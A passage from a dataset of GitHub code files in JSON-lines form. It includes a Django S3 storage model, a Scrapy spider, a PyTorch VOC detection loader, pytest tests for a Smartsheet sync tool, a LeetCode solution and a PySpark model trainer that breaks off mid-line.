here\n","repo_name":"johnnvas/Med.io","sub_path":"app/seeds/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74224944461","text":"import logging\nimport os\nimport pprint\nimport re\nfrom functools import wraps\n\nimport boto3\nimport botocore\nfrom common import utils\nfrom django.conf import settings\nfrom django.db import models\nfrom django.utils.translation import gettext_lazy as _\n\nfrom . import StorageException\nfrom .location import Location\n\n\nLOGGER = logging.getLogger(__name__)\n\n\ndef boto_exception(fn):\n @wraps(fn)\n def _inner(*args, **kwargs):\n try:\n return fn(*args, **kwargs)\n except botocore.exceptions.BotoCoreError as e:\n raise StorageException(\"AWS error: %r\", e)\n\n return _inner\n\n\nclass S3(models.Model):\n space = models.OneToOneField(\"Space\", to_field=\"uuid\", on_delete=models.CASCADE)\n access_key_id = models.CharField(\n max_length=64, blank=True, verbose_name=_(\"Access Key ID to authenticate\")\n )\n secret_access_key = models.CharField(\n max_length=256,\n blank=True,\n verbose_name=_(\"Secret Access Key to authenticate with\"),\n )\n endpoint_url = models.CharField(\n max_length=2048,\n verbose_name=_(\"S3 Endpoint URL\"),\n help_text=_(\"S3 Endpoint URL. Eg. https://s3.amazonaws.com\"),\n )\n region = models.CharField(\n max_length=64,\n verbose_name=_(\"Region\"),\n help_text=_(\"Region in S3. Eg. us-east-2\"),\n )\n bucket = models.CharField(\n max_length=64,\n verbose_name=_(\"S3 Bucket\"),\n blank=True,\n help_text=_(\"S3 Bucket Name\"),\n )\n\n class Meta:\n verbose_name = _(\"S3\")\n app_label = \"locations\"\n\n ALLOWED_LOCATION_PURPOSE = [\n Location.AIP_STORAGE,\n Location.DIP_STORAGE,\n Location.REPLICATOR,\n Location.TRANSFER_SOURCE,\n ]\n\n @property\n def resource(self):\n if not hasattr(self, \"_resource\"):\n config = botocore.config.Config(\n connect_timeout=settings.S3_TIMEOUTS, read_timeout=settings.S3_TIMEOUTS\n )\n boto_args = {\n \"service_name\": \"s3\",\n \"endpoint_url\": self.endpoint_url,\n \"region_name\": self.region,\n \"config\": config,\n }\n if self.access_key_id and self.secret_access_key:\n boto_args.update(\n aws_access_key_id=self.access_key_id,\n aws_secret_access_key=self.secret_access_key,\n )\n self._resource = boto3.resource(**boto_args)\n return self._resource\n\n @boto_exception\n def _ensure_bucket_exists(self):\n \"\"\"Ensure that the bucket exists by asking it something about itself.\n If we cannot retrieve metadata about it, and specifically, we can\n determine the endpoint has returned a `NoSuchBucket' error code then\n we attempt to create the bucket, else, we raise a StorageException.\n\n NB. Boto3 has an API called head_bucket that looks to return 400,\n Bad Request at time of 1.9.174 when the S3 documents suggest 404, or\n more 'specifically':\n\n > Otherwise, the operation might return responses such as 404 Not\n > Found and 403 Forbidden. \"\n via-- Amazon AWS: https://docs.aws.amazon.com/AmazonS3/latest/API/RESTBucketHEAD.html\n \"\"\"\n LOGGER.debug(\"Test the S3 bucket '%s' exists\", self.bucket_name)\n try:\n loc_info = self.resource.meta.client.get_bucket_location(\n Bucket=self.bucket_name\n )\n LOGGER.debug(\"S3 bucket's response: %s\", loc_info)\n except botocore.exceptions.ClientError as err:\n error_code = err.response[\"Error\"][\"Code\"]\n if error_code != \"NoSuchBucket\":\n raise StorageException(err)\n LOGGER.info(\"Creating S3 bucket '%s'\", self.bucket_name)\n # LocationConstraint cannot be specified if it us-east-1 because it is the default, see: https://github.com/boto/boto3/issues/125\n if self.region.lower() == \"us-east-1\":\n self.resource.create_bucket(Bucket=self.bucket_name)\n else:\n self.resource.create_bucket(\n Bucket=self.bucket_name,\n CreateBucketConfiguration={\"LocationConstraint\": self.region},\n )\n\n @property\n def bucket_name(self):\n return self.bucket or str(self.space_id)\n\n def browse(self, path):\n LOGGER.debug(\"Browsing s3://%s/%s on S3 storage\", self.bucket_name, path)\n path = path.lstrip(\"/\")\n\n # We need a trailing slash on non-empty prefixes because a path like:\n #\n # /path/to/requirements\n #\n # will happily prefix match:\n #\n # /path/to/requirements.txt\n #\n # which is not the intention!\n #\n if path != \"\":\n path = path.rstrip(\"/\") + \"/\"\n\n objects = self.resource.Bucket(self.bucket_name).objects.filter(Prefix=path)\n\n directories = set()\n entries = set()\n properties = {}\n\n for objectSummary in objects:\n relative_key = objectSummary.key.replace(path, \"\", 1).lstrip(\"/\")\n\n if \"/\" in relative_key:\n directory_name = re.sub(\"/.*\", \"\", relative_key)\n if directory_name:\n directories.add(directory_name)\n entries.add(directory_name)\n elif relative_key != \"\":\n entries.add(relative_key)\n properties[relative_key] = {\n \"size\": objectSummary.size,\n \"timestamp\": objectSummary.last_modified,\n \"e_tag\": objectSummary.e_tag,\n }\n\n return {\n \"directories\": list(directories),\n \"entries\": list(entries),\n \"properties\": properties,\n }\n\n def delete_path(self, delete_path):\n \"\"\"Delete an object from an S3 bucket. We assume an object exists, if\n it doesn't then the generator returned by the S3 library (Boto3) cannot\n be iterated, and we raise a StorageException.\n \"\"\"\n if delete_path.startswith(os.sep):\n LOGGER.info(\n \"S3 path to delete {} begins with {}; removing from path prior to deletion\".format(\n delete_path, os.sep\n )\n )\n delete_path = delete_path.lstrip(os.sep)\n obj = self.resource.Bucket(self.bucket_name).objects.filter(Prefix=delete_path)\n items = False\n for object_summary in obj:\n items = True\n resp = object_summary.delete()\n LOGGER.debug(\"S3 response when attempting to delete:\")\n LOGGER.debug(pprint.pformat(resp))\n if not items:\n err_str = f\"No packages found in S3 at: {delete_path}\"\n LOGGER.warning(err_str)\n raise StorageException(err_str)\n\n def move_to_storage_service(self, src_path, dest_path, dest_space):\n self._ensure_bucket_exists()\n bucket = self.resource.Bucket(self.bucket_name)\n\n # strip leading slash on src_path\n src_path = src_path.lstrip(\"/\").rstrip(\".\")\n dest_path = dest_path.rstrip(\".\")\n\n # Directories need to have trailing slashes to ensure they are created\n # on the staging path.\n if not utils.package_is_file(dest_path):\n dest_path = os.path.join(dest_path, \"\")\n\n objects = self.resource.Bucket(self.bucket_name).objects.filter(Prefix=src_path)\n\n for objectSummary in objects:\n dest_file = objectSummary.key.replace(src_path, dest_path, 1)\n self.space.create_local_directory(dest_file)\n if not os.path.isdir(dest_file):\n bucket.download_file(objectSummary.key, dest_file)\n\n def move_from_storage_service(self, src_path, dest_path, package=None):\n self._ensure_bucket_exists()\n bucket = self.resource.Bucket(self.bucket_name)\n\n if os.path.isdir(src_path):\n # ensure trailing slash on both paths\n src_path = os.path.join(src_path, \"\")\n dest_path = os.path.join(dest_path, \"\")\n\n # strip leading slash on dest_path\n dest_path = dest_path.lstrip(\"/\")\n\n for path, dirs, files in os.walk(src_path):\n for basename in files:\n entry = os.path.join(path, basename)\n dest = entry.replace(src_path, dest_path, 1)\n\n self.upload_object(bucket, dest, entry)\n\n elif os.path.isfile(src_path):\n # strip leading slash on dest_path\n dest_path = dest_path.lstrip(\"/\")\n\n self.upload_object(bucket, dest_path, src_path)\n\n else:\n raise StorageException(\n _(\"%(path)s is neither a file nor a directory, may not exist\")\n % {\"path\": src_path}\n )\n\n def upload_object(self, bucket, path, data):\n extra_args = {}\n mtype = utils.get_mimetype(path)\n if mtype:\n extra_args[\"ContentType\"] = mtype\n\n with open(data, \"rb\") as d:\n bucket.upload_fileobj(d, path, ExtraArgs=extra_args)\n","repo_name":"artefactual/archivematica-storage-service","sub_path":"storage_service/locations/models/s3.py","file_name":"s3.py","file_ext":"py","file_size_in_byte":9154,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"47"} +{"seq_id":"9429212355","text":"#!/usr/local/bin/python\n\nfh = open('../country.txt', 'rb')\n\nindex = {}\nwhile True:\n line = fh.readline()\n if not line: break\n fields = line.decode().split(',')\n index[fields[0]] = fh.tell() - len(line) \n\nwhile True: \n key = input('Enter a country: ') \n if key == '':\n break\n\n if not key in index:\n print(f\"'{key}' not in the file.\")\n continue\n \n fh.seek(index[key])\n print(fh.readline().decode(), end=\"\")\n","repo_name":"flathunt/pylearn","sub_path":"examples/07 io-pickle-n-shelve/direct.py","file_name":"direct.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"39216472814","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.http import Request\nfrom urllib import parse\nimport re\n\n# from scrapy.loader import ItemLoader\nfrom jobboleCrawler.items import ArticleItemLoader\nfrom jobboleCrawler.items import JobboleArticleItem\nfrom jobboleCrawler.utils.common import get_md5\n\n\nclass JobboleSpider(scrapy.Spider):\n name = 'jobbole'\n allowed_domains = ['blog.jobbole.com']\n start_urls = ['http://blog.jobbole.com/all-posts/']\n\n def parse(self, response):\n\n post_nodes = response.css(\"#archive > .post.floated-thumb > .post-thumb > a\");\n for post_node in post_nodes:\n img_url = post_node.css(\"img::attr(src)\").extract_first(\"\");\n post_url = post_node.css(\"::attr(href)\").extract_first(\"\");\n yield Request(url=parse.urljoin(response.url, post_url), callback=self.parse_detail, meta={\"front_img_url\": img_url})\n\n next_url = response.css('a.next.page-numbers::attr(href)').extract_first(\"\")\n if next_url:\n next_page = int(re.match(r\".*?(\\d+).*\", next_url).group(1))\n if next_page >= 3: # only crawl first two page\n return\n yield Request(url=parse.urljoin(response.url, next_url), callback=self.parse)\n\n def parse_detail(self, response):\n\n front_img_url = response.meta.get('front_img_url', \"\")\n\n # load Itemloader\n item_loader = ArticleItemLoader(item=JobboleArticleItem(), response=response)\n item_loader.add_css(\"title\", \".entry-header h1::text\")\n item_loader.add_value(\"url\", response.url)\n item_loader.add_value(\"url_object_id\", get_md5(response.url))\n item_loader.add_css(\"create_date\", \"p.entry-meta-hide-on-mobile::text\")\n item_loader.add_css(\"praise_nums\", \".vote-post-up h10::text\")\n item_loader.add_css(\"fav_nums\", \".bookmark-btn::text\")\n item_loader.add_css(\"tag_list\", \"p.entry-meta-hide-on-mobile a::text\")\n item_loader.add_css(\"content\", \"div.entry\")\n item_loader.add_value(\"front_img_url\", front_img_url)\n\n article_item = item_loader.load_item()\n\n yield article_item\n\n","repo_name":"wk633/articleCrawler","sub_path":"jobboleCrawler/jobboleCrawler/spiders/jobbole.py","file_name":"jobbole.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"70847639182","text":"#!/usr/bin/env python3\nimport os, sys, re\nfrom ROOT import gROOT\nfrom rootUtil3 import useAtlasStyle, waitRootCmd, savehistory, mkupHistSimple, get_default_fig_dir\nfunlist=[]\n\nsDir = get_default_fig_dir()\nsTag = 'test_'\nsDirectly = False\nif gROOT.IsBatch(): sDirectly = True\n\ndef test():\n\n return \"In test\"\n\n waitRootCmd()\nfunlist.append(test)\n\nif __name__ == '__main__':\n savehistory('.')\n useAtlasStyle()\n for fun in funlist: print(fun())\n","repo_name":"dajiaonao/scripts_collection","sub_path":"py_scripts/templete_new.py","file_name":"templete_new.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"18245192548","text":"# https://leetcode.com/problems/find-the-celebrity/\n\n# The knows API is already defined for you.\n# return a bool, whether a knows b\n# def knows(a: int, b: int) -> bool:\n\n\nclass Solution:\n def findCelebrity(self, n: int) -> int:\n \"\"\"\n 0123456 7 89\n c\n \n 01 -> know(0, 1) true: 0 is not c, 1 might be c\n false: 1 is not c, 0 might be c\n \"\"\"\n # first we need to find a candidate by looking through the list\n candidate = 0\n for i in range(1, n):\n if knows(candidate, i): # if candidate knows i, candidate must not be the celebrity while i might be the celebrity.\n candidate = i\n\n # after finding the candidate, we need to check if the candidate is valid.\n for i in range(n):\n if i != candidate and knows(candidate, i): # check if candidate knows others. if yes, it is a invalid candidate\n return -1\n if not knows(i, candidate): # check if all others know candidate. If not, it is a invalid candidate.\n return -1\n return candidate\n","repo_name":"zihuaweng/leetcode-solutions","sub_path":"leetcode_python/277.Find_the_Celebrity.py","file_name":"277.Find_the_Celebrity.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"32703915646","text":"rows = int(input())\nwall = []\nfree = \" \"\nfor i in range(rows):\n wall.append(input())\n counter = wall[i].count(\"#\")\n\n if counter < len(wall[i]):\n if \"k\" in wall[i]:\n if free in wall[i]:\n print(f\"K!@index:{wall[i].index('k')} free slots:{wall[i].count(free)}@index:{wall[i].index(free)}\")\n else:\n print(f\"K! but ain't a way\")\n else:\n print(\"No way\")\nprint(wall)\n","repo_name":"vvakrilov/python_courses","sub_path":"02. Fundamental/10. More Exercises/15. Kate's Way Out (Lists Advansed More Exercises).py","file_name":"15. Kate's Way Out (Lists Advansed More Exercises).py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"30087223442","text":"import sys\nfrom familia_wrapper import InferenceEngineWrapper\n\nif sys.version_info < (3,0):\n input = raw_input\n\nif __name__ == '__main__':\n if len(sys.argv) < 4:\n sys.stderr.write(\"Usage:python {} {} {} {}.\\n\".format(\n sys.argv[0], \"model_dir\", \"conf_file\", \"emb_file\"))\n exit(-1)\n\n # 获取参数\n model_dir = sys.argv[1]\n conf_file = sys.argv[2]\n emb_file = sys.argv[3]\n # 创建InferenceEngineWrapper对象\n inference_engine_wrapper = InferenceEngineWrapper(model_dir, conf_file, emb_file)\n while True:\n # 输入短文本和长文本\n query = input(\"Enter Query: \").strip()\n doc = input(\"Enter Document: \").strip()\n query_seg = inference_engine_wrapper.tokenize(query)\n doc_seg = inference_engine_wrapper.tokenize(doc)\n distances = inference_engine_wrapper.cal_query_doc_similarity(query_seg, doc_seg)\n # 打印结果\n print(\"LDA Similarity = {}\".format(distances[0]))\n print(\"TWE similarity = {}\".format(distances[1]))\n","repo_name":"baidu/Familia","sub_path":"python/demo/query_doc_sim_demo.py","file_name":"query_doc_sim_demo.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":2622,"dataset":"github-code","pt":"47"} +{"seq_id":"10002201252","text":"import xml.etree.ElementTree as ET\n\nimport torch\nfrom torchvision import datasets as VD\nfrom torchvision.io import read_image\n\n\ndef det_collate_fn(batch):\n return tuple(zip(*batch))\n\n\nclass VOCDetection(object):\n def __new__(cls,\n root,\n train=True,\n transform=None,\n download=False):\n if train:\n train_kwargs = dict(image_set='trainval', transforms=transform, download=download)\n train_2007 = _VOCDetection(root, year='2007', **train_kwargs)\n train_2012 = _VOCDetection(root, year='2012', **train_kwargs)\n remove_difficult(train_2007)\n remove_difficult(train_2012)\n return train_2007 + train_2012\n\n else:\n val_set = _VOCDetection(root, year='2007', image_set='test', transforms=transform, download=download)\n return val_set\n\n def __len__(self):\n ...\n\n\nclass _VOCDetection(VD.VOCDetection):\n voc_bbox_label_names = ('aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow',\n 'diningtable', 'dog', 'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa',\n 'train', 'tvmonitor')\n\n def __getitem__(self, item):\n\n img = read_image(self.images[item])\n tgt = self.parse_voc_xml(ET.parse(self.annotations[item]).getroot())\n bbox = []\n label = []\n difficult = []\n objs = tgt['annotation']['object']\n if not isinstance(objs, list):\n objs = [objs]\n for obj in objs:\n bbox.append([int(obj['bndbox'][k]) for k in ('xmin', 'ymin', 'xmax', 'ymax')])\n label.append(self.voc_bbox_label_names.index(obj['name']))\n difficult.append(int(obj['difficult']))\n tgt = dict(boxes=torch.tensor(bbox, dtype=torch.long),\n labels=torch.tensor(label, dtype=torch.long),\n difficult=torch.tensor(difficult, dtype=torch.long))\n if self.transforms is not None:\n bbox = tgt['boxes'].float()\n img, bbox = self.transforms(img, bbox)\n tgt['boxes'] = bbox.long()\n return img, tgt\n\n\ndef remove_difficult(dataset: _VOCDetection):\n for index in range(len(dataset)):\n target = dataset.parse_voc_xml(ET.parse(dataset.annotations[index]).getroot())\n objs = target['annotation']['object']\n if not isinstance(objs, list):\n objs = [objs]\n target['annotation']['object'] = [obj for obj in objs if obj['difficult'] != '1']\n\n if len(objs) == 0:\n dataset.images.pop(index)\n dataset.annotations.pop(index)\n","repo_name":"moskomule/homura","sub_path":"homura/vision/data/detection.py","file_name":"detection.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"47"} +{"seq_id":"13533982891","text":"import json\nimport logging\nfrom unittest.mock import patch\n\nimport pytest\nimport smartsheet\nimport data_module.helper as helper\nimport app.variables as app_vars\nimport data_module.write_data as write_data\nimport data_module.get_data as get_data\nfrom freezegun import freeze_time\n\n_, cwd = helper.get_local_paths()\nlogger = logging.getLogger(__name__)\n\n\n# @pytest.fixture(scope=\"module\")\n# def sheet_fixture():\n# import data_module.helper as helper\n# with open(cwd + '/dev_program_plan.json') as f:\n# sheet_json = json.load(f)\n\n# def no_uuid_col_fixture(sheet_json):\n# json_copy = sheet_json.copy()\n# json_copy['columns'][20]['name'] = \"Not UUID\"\n# no_uuid_col = smartsheet.models.Sheet(json_copy)\n# return no_uuid_col\n\n# def no_summary_col_fixture(sheet_json):\n# json_copy = sheet_json.copy()\n# json_copy['columns'][4]['name'] = \"Not Summary\"\n# no_summary_col = smartsheet.models.Sheet(json_copy)\n# return no_summary_col\n\n# sheet = smartsheet.models.Sheet(sheet_json)\n# col_map = helper.get_column_map(sheet)\n# sheet_no_uuid_col = no_uuid_col_fixture(sheet_json)\n# sheet_no_summary_col = no_summary_col_fixture(sheet_json)\n# return sheet, col_map, sheet_no_uuid_col, sheet_no_summary_col\n\n\n# @pytest.fixture\n# def row_fixture():\n# with open(cwd + '/dev_program_plan_row.json') as f:\n# linked_row_json = json.load(f)\n# with open(cwd + '/dev_program_plan_row.json') as f:\n# unlinked_row_json = json.load(f)\n# linked_row = smartsheet.models.Row(linked_row_json)\n# unlinked_row = smartsheet.models.Row(unlinked_row_json)\n# return linked_row, unlinked_row\n\n\n# @pytest.fixture(scope=\"module\")\n# def index_fixture():\n# import data_module.get_data as get_data\n# with open(cwd + '/dev_jira_index_sheet.json') as f:\n# sheet_json = json.load(f)\n# index_sheet = smartsheet.models.Sheet(sheet_json)\n\n# @patch(\"data_module.smartsheet_api.get_sheet\", return_value=index_sheet)\n# def load_jira_index_fixture(mock_0):\n# jira_index_sheet, jira_index_col_map, jira_index_rows \\\n# = get_data.load_jira_index(index_sheet.id)\n# return jira_index_sheet, jira_index_col_map, jira_index_rows\n\n# jira_index_sheet, jira_index_col_map, jira_index_rows \\\n# = load_jira_index_fixture()\n# return jira_index_sheet, jira_index_col_map, jira_index_rows\n\n\n# @pytest.fixture\n# def env():\n# return \"-debug\"\n\n\n@pytest.fixture\ndef uuids():\n uuid_value = [\"7208979009955716-3683235938232196-\"\n \"7010994181433220-202105112138550000\"]\n jira_value = \"JAR-123\"\n uuid_list = [\"7208979009955716-3683235938232196-\"\n \"7010994181433220-202105112138550000\"]\n jira_data_values = [\"JAR-123\", \"JAR-456\"]\n return uuid_value, jira_value, uuid_list, jira_data_values\n\n\n@pytest.fixture\ndef src_data():\n data = {\n \"UUID\": \"7208979009955716-3683235938232196-\"\n \"7010994181433220-202105112138550000\", # Type: str\n \"Tasks\": \"Retrospective\", # Type: str\n \"Description\": \"Thoughts on how the project went.\", # Type: str\n \"Status\": \"In Progress\", # Type: str\n \"Assigned To\": \"link@twitch.tv\", # Type: str\n \"Jira Ticket\": \"ING-12342\", # Type: str\n \"Duration\": None, # Type: str\n \"Start\": \"2021-03-31T08:00:00\", # Type: str\n \"Finish\": \"2021-03-31T08:00:00\", # Type: str\n \"Predecessors\": \"38FS +1w\", # Type: str\n \"Summary\": \"False\" # Type: str\n }\n return data\n\n\n@pytest.fixture\n@freeze_time(\"2021-11-18 21:23:54\")\n# TODO: Static return and check for actual values\ndef project_indexes(sheet_fixture):\n import app.config as config\n import data_module.get_data as get_data\n sheet, _, _, _ = sheet_fixture\n project_uuid_index = get_data.get_all_row_data([sheet],\n app_vars.sheet_columns,\n config.minutes)\n _, sub_index = get_data.get_sub_indexes(project_uuid_index)\n return project_uuid_index, sub_index\n\n\ndef test_write_uuids_0():\n with pytest.raises(TypeError):\n write_data.write_uuids(\"sheets_to_update\")\n\n\ndef test_write_uuids_1(sheet_fixture):\n sheet, _, _, _ = sheet_fixture\n sheets_to_update = {}\n sheets_to_update[sheet.id] = {\n \"sheet_name\": sheet.name, \"row_data\": {}}\n\n result = smartsheet.models.Result()\n result.message = \"SUCCESS\"\n result.result_code = 0\n\n @patch(\"data_module.smartsheet_api.write_rows_to_sheet\",\n return_value=result)\n def test_0(mock_0):\n sheets_updated = write_data.write_uuids(sheets_to_update)\n return sheets_updated\n\n result_0 = test_0()\n assert isinstance(result_0, int)\n assert result_0 == 0\n\n\ndef test_write_uuids_2(sheet_fixture):\n _, col_map, _, _ = sheet_fixture\n with open(cwd + '/dev_program_plan.json') as f:\n blank_uuid_sheet = json.load(f)\n\n for row in blank_uuid_sheet['rows']:\n for cell in row['cells']:\n if cell['columnId'] == col_map[app_vars.uuid_col]:\n cell['value'] = None\n cell['objectValue'] = None\n cell['displayValue'] = None\n blank_uuid_sheet = smartsheet.models.Sheet(blank_uuid_sheet)\n sheets_to_update = get_data.get_blank_uuids([blank_uuid_sheet])\n\n result = smartsheet.models.Result()\n result.message = \"SUCCESS\"\n result.result_code = 0\n\n @patch(\"data_module.smartsheet_api.write_rows_to_sheet\",\n return_value=result)\n def test_0(mock_0):\n sheets_updated = write_data.write_uuids(sheets_to_update)\n return sheets_updated\n\n result_0 = test_0()\n assert isinstance(result_0, int)\n assert result_0 == 1\n\n\ndef test_write_jira_index_cell_links_0():\n with pytest.raises(TypeError):\n write_data.write_jira_index_cell_links(\"project_sub_index\")\n with pytest.raises(ValueError):\n write_data.write_jira_index_cell_links({})\n\n\ndef test_write_jira_index_cell_links_1(index_sheet_fixture,\n sheet_fixture):\n\n sheet, _, _, _ = sheet_fixture\n index_sheet, index_col_map, index_rows, _ = index_sheet_fixture\n\n result = smartsheet.models.Result()\n result.message = \"SUCCESS\"\n result.result_code = 0\n\n @patch(\"data_module.smartsheet_api.write_rows_to_sheet\",\n return_value=result)\n @patch(\"data_module.get_data.load_jira_index\",\n return_value=(index_sheet, index_col_map,\n index_rows))\n @patch(\"data_module.smartsheet_api.get_sheet\", return_value=sheet)\n def test_0(mock_0, mock_1, mock_2):\n project_sub_index = {}\n project_sub_index[31337] = \"1337\"\n with pytest.raises(ValueError):\n write_data.write_jira_index_cell_links(project_sub_index)\n return True\n\n @patch(\"data_module.smartsheet_api.write_rows_to_sheet\",\n return_value=result)\n @patch(\"data_module.get_data.load_jira_index\",\n return_value=(index_sheet, index_col_map,\n index_rows))\n @patch(\"data_module.smartsheet_api.get_sheet\", return_value=sheet)\n def test_1(mock_0, mock_1, mock_2):\n project_sub_index = {}\n project_sub_index[\"31337\"] = 1337\n with pytest.raises(ValueError):\n write_data.write_jira_index_cell_links(project_sub_index)\n return True\n\n result_0 = test_0()\n result_1 = test_1()\n assert result_0 is True\n assert result_1 is True\n\n\ndef test_write_jira_index_cell_links_2(project_indexes, index_sheet_fixture,\n sheet_fixture):\n _, project_sub_index = project_indexes\n sheet, _, _, _ = sheet_fixture\n index_sheet, index_col_map, index_rows, _ = index_sheet_fixture\n\n result = smartsheet.models.Result()\n result.message = \"SUCCESS\"\n result.result_code = 0\n\n @patch(\"data_module.smartsheet_api.write_rows_to_sheet\",\n return_value=result)\n @patch(\"data_module.get_data.load_jira_index\",\n return_value=(index_sheet, index_col_map,\n index_rows))\n @patch(\"data_module.smartsheet_api.get_sheet\", return_value=sheet)\n def test_0(mock_0, mock_1, mock_2):\n var_0 = write_data.write_jira_index_cell_links(project_sub_index)\n return var_0\n\n result_0 = test_0()\n result_1 = \"No Jira Ticket updates needed for Sheet ID\" in result_0\n assert isinstance(result_0, str)\n assert result_1 is True\n\n\n# TODO: Build a version of the sheet we can use to link and get a successful\n# msg back.\n# def test_write_jira_index_cell_links_3(project_indexes, index_fixture,\n# sheet_fixture, row_fixture):\n# _, project_sub_index = project_indexes\n# sheet, _, _, _ = sheet_fixture\n# jira_index_sheet, jira_index_col_map, jira_index_rows = index_fixture\n# row, _ = row_fixture\n\n# result = smartsheet.models.Result()\n # result.message = \"SUCCESS\"\n # result.result_code = 0\n\n # @patch(\"data_module.smartsheet_api.write_rows_to_sheet\",\n # return_value=result)\n# @patch(\"data_module.build_data.build_row\", return_value=row)\n# @patch(\"data_module.get_data.load_jira_index\",\n# return_value=(jira_index_sheet, jira_index_col_map,\n# jira_index_rows))\n# @patch(\"data_module.smartsheet_api.get_sheet\", return_value=sheet)\n# def test_0(mock_0, mock_1, mock_2, mock_3):\n# var_0 = write_data.write_jira_index_cell_links(project_sub_index)\n# return var_0\n\n# result_0 = test_0()\n# result_1 = \"Writing\" in result_0\n# assert isinstance(result_0, str)\n# assert result_1 is True\n\n\n# def test_write_predecessor_dates_0(src_data, project_indexes):\n# project_data_index, _ = project_indexes\n# with pytest.raises(TypeError):\n# write_data.write_predecessor_dates(\"src_data\", project_data_index)\n# with pytest.raises(TypeError):\n# write_data.write_predecessor_dates(src_data, \"project_data_index\")\n# with pytest.raises(ValueError):\n# data_copy = src_data.copy()\n# data_copy[\"UUID\"] = 1337\n# write_data.write_predecessor_dates(data_copy, project_data_index)\n# with pytest.raises(ValueError):\n# data_copy = src_data.copy()\n# data_copy.pop(\"UUID\", None)\n# write_data.write_predecessor_dates(data_copy, project_data_index)\n# # Format of the src_data should be:\n# # {\n# # \"UUID\": \"7208979009955716-3683235938232196-\n# # 7010994181433220-202105112138550000\", # Type: str\n# # \"Tasks\": \"Retrospective\", # Type: str\n# # \"Description\": \"Thoughts on how the project went.\", # Type: str\n# # \"Status\": \"In Progress\", # Type: str\n# # \"Assigned To\": \"link@twitch.tv\", # Type: str\n# # \"Jira Ticket\": \"ING-12342\", # Type: str\n# # \"Duration\": None, # Type: str\n# # \"Start\": \"2021-03-31T08:00:00\", # Type: str\n# # \"Finish\": \"2021-03-31T08:00:00\", # Type: str\n# # \"Predecessors\": \"38FS +1w\", # Type: str\n# # \"Summary\": \"False\" # Type: str\n# # }\n\n\n# def test_write_predecessor_dates_1(src_data, project_indexes,\n# sheet_fixture, row_fixture, cell_fixture):\n# project_data_index, _ = project_indexes\n# sheet, col_map, _, _ = sheet_fixture\n# _, unlinked_row = row_fixture\n# pred_cell, _, _, _, _, _ = cell_fixture\n\n# # Format of the src_data should be:\n# # {\n# # \"UUID\": \"7208979009955716-3683235938232196-\n# # 7010994181433220-202105112138550000\", # Type: str\n# # \"Tasks\": \"Retrospective\", # Type: str\n# # \"Description\": \"Thoughts on how the project went.\", # Type: str\n# # \"Status\": \"In Progress\", # Type: str\n# # \"Assigned To\": \"link@twitch.tv\", # Type: str\n# # \"Jira Ticket\": \"ING-12342\", # Type: str\n# # \"Duration\": None, # Type: str\n# # \"Start\": \"2021-03-31T08:00:00\", # Type: str\n# # \"Finish\": \"2021-03-31T08:00:00\", # Type: str\n# # \"Predecessors\": \"38FS +1w\", # Type: str\n# # \"Summary\": \"False\" # Type: str\n# # }\n\n# result = smartsheet.models.Result()\n# result.message = \"SUCCESS\"\n# result.result_code = 0\n\n# @patch(\"data_module.smartsheet_api.get_sheet\", return_value=sheet)\n# @patch(\"data_module.helper.get_column_map\", return_value=col_map)\n# @patch(\"data_module.smartsheet_api.get_row\", return_value=unlinked_row)\n# @patch(\"data_module.helper.get_cell_data\",\n# return_value=pred_cell)\n# @patch(\"data_module.smartsheet_api.write_rows_to_sheet\",\n# return_value=result)\n# def test_0(mock_0, mock_1, mock_2, mock_3, mock_4):\n# result_0 = write_data.write_predecessor_dates(src_data,\n# project_data_index)\n# return result_0\n# result_1 = test_0()\n# assert result_1 is True\n","repo_name":"herooftimeandspace/smartsheet-data-sync","sub_path":"test_unit/test_write_data.py","file_name":"test_write_data.py","file_ext":"py","file_size_in_byte":13051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"39594993407","text":"\nfrom src.entity.artifact_entity import DataTransformationArtifact,ModelTrainingArtifact,\\\n PartialModelTrainerMetricArtifact,PartialModelTrainerRefArtifact\nfrom src.entity.config_entity import ModelTrainerConfig\nfrom src.logger import logger\nfrom src.exception import FinanceException\nfrom src.entity.schema import FinanceDataSchema\nimport os, sys\nfrom pyspark.sql import DataFrame\nfrom pyspark.ml.feature import StringIndexer,StringIndexerModel\nfrom typing import List\nfrom pyspark.ml.feature import IndexToString\nfrom pyspark.ml import Pipeline,PipelineModel\nfrom pyspark.ml.classification import RandomForestClassifier, LogisticRegression\nfrom src.utils import get_score\nfrom src.config.spark_manager import spark_session \nclass ModelTrainer:\n\n def __init__(self, config:ModelTrainerConfig, artifact:DataTransformationArtifact,\n schema=FinanceDataSchema()) -> None:\n self.trainer_config = config\n self.transform_artifact= artifact\n self.schema = schema\n\n def get_train_test_dataframe(self)->List[DataFrame]:\n try:\n train_data_path = self.transform_artifact.transformed_train_file_path\n test_data_path = self.transform_artifact.transformed_test_file_path\n train_df = spark_session.read.parquet(train_data_path)\n test_df = spark_session.read.parquet(test_data_path)\n dataframes: List[DataFrame] = [train_df, test_df]\n return dataframes\n except Exception as exp:\n raise FinanceException(exp, sys)\n\n def get_model(self, label_indexer_model:StringIndexerModel)->Pipeline:\n try:\n stages = []\n logger.info(\"Creating Random Forest Classifier class.\")\n rand_forest_clf 